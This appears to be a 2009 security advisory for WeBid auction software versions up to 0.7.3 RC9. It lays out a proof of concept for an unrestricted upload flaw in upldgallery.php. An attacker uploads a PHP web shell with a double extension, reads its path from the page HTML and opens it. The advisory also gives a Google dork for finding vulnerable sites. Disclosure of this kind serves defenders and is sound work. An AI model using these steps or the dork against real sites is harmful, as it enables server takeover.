WeBid version 0.7.3 RC9 suffers from a remote file upload vulnerability in upldgallery.php.
724b8054ac1686214a3888b7b44ef75017f91526d2630701cadc8a98b66e99b0-----------------------------------------------------------------------------------------
Author : Ahmad Pay
Date : March, 25 2009
Location : Bojonegoro, Indonesia
Critical : High
Impact : System Access
Where : From Remote
---------------------------------------------------------------------------
Application : WeBid
version : <= 0.7.3 RC9
Vendor : http://sourceforge.net/projects/simpleauction
--------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~
Anyone can upload shell php with extension eg: shell.php.jpg.
Poc/Exploit:
~~~~
http://www.example.com/[path]/upldgallery.php
Then after upload shell right click to the pages to find your shell path
#######################################
eg:
</script>
</head>
<body bgcolor="#FFFFFF">
<div class="container">
<img src="uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg" style="float: left; margin-right: 10px;" id="thumbnail" alt="Create Thumbnail" />
<div style="float:left; position:relative; overflow:hidden; border:#000000 double; width:0; height:0;">
<img src="uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg" style="position: relative;" alt="Thumbnail Preview" />
</div>
#######################################
Shell address above is : http://www.example.com/[path]/uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg
--------------------------------------------------------------------------
Dork:
~
Google : Powered by WeBid © 2008, 2009 Webid
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed